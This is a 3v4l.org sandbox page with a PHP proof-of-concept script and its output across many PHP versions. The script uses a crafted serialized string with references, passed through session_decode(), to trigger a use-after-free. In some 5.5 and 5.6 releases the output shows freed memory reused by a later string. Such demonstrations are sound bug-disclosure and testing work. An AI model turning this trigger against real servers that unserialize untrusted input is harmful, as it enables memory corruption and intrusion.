3v4l.org

run code in 300+ PHP versions simultaneously
<?php ini_set('session.serialize_handler', 'php_serialize'); session_start(); class obj implements Serializable { var $data; function serialize() { return serialize($this->data); } function unserialize($data) { session_decode($data); } } $inner = 'r:2;'; $exploit = 'a:2:{i:0;C:3:"obj":'.strlen($inner).':{'.$inner.'}i:1;C:3:"obj":'.strlen($inner).':{'.$inner.'}}'; $data = unserialize($exploit); for ($i = 0; $i < 5; $i++) { $v[$i] = 'hi'.$i; } var_dump($data); var_dump($_SESSION);
Output for 8.1.0 - 8.1.28, 8.2.0 - 8.2.18, 8.3.0 - 8.3.6
Deprecated: obj implements the Serializable interface, which is deprecated. Implement __serialize() and __unserialize() instead (or in addition, if support for old PHP versions is necessary) in /in/rpWBi on line 6 array(2) { [0]=> object(obj)#1 (1) { ["data"]=> NULL } [1]=> object(obj)#2 (1) { ["data"]=> NULL } } object(obj)#1 (1) { ["data"]=> NULL }
Output for 7.0.0 - 7.0.20, 7.1.0 - 7.1.33, 7.2.0 - 7.2.33, 7.3.0 - 7.3.33, 7.4.3 - 7.4.33, 8.0.0 - 8.0.30
array(2) { [0]=> object(obj)#1 (1) { ["data"]=> NULL } [1]=> object(obj)#2 (1) { ["data"]=> NULL } } object(obj)#1 (1) { ["data"]=> NULL }
Output for 7.4.0
array(2) { [0]=> object(obj)#1 (1) { ["data"]=> NULL } [1]=> object(obj)#2 (1) { ["data"]=> NULL } } array(0) { }
Output for 5.5.29 - 5.5.35, 5.6.13 - 5.6.28
array(2) { [0]=> &object(obj)#1 (1) { ["data"]=> NULL } [1]=> object(obj)#2 (1) { ["data"]=> NULL } } object(obj)#1 (1) { ["data"]=> NULL }
Output for 5.5.24 - 5.5.28, 5.6.7 - 5.6.12
array(2) { [0]=> string(3) "hi0" [1]=> object(obj)#2 (1) { ["data"]=> NULL } } string(3) "hi0"
Output for 5.4.0 - 5.4.45
Warning: ini_set(): Cannot find serialization handler 'php_serialize' in /in/rpWBi on line 3 Warning: session_start(): Cannot send session cookie - headers already sent by (output started at /in/rpWBi:3) in /in/rpWBi on line 4 Warning: session_start(): Cannot send session cache limiter - headers already sent (output started at /in/rpWBi:3) in /in/rpWBi on line 4 array(2) { [0]=> object(obj)#1 (1) { ["data"]=> NULL } [1]=> object(obj)#2 (1) { ["data"]=> NULL } } array(0) { }
preferences:
202.59 ms | 402 KiB | 259 Q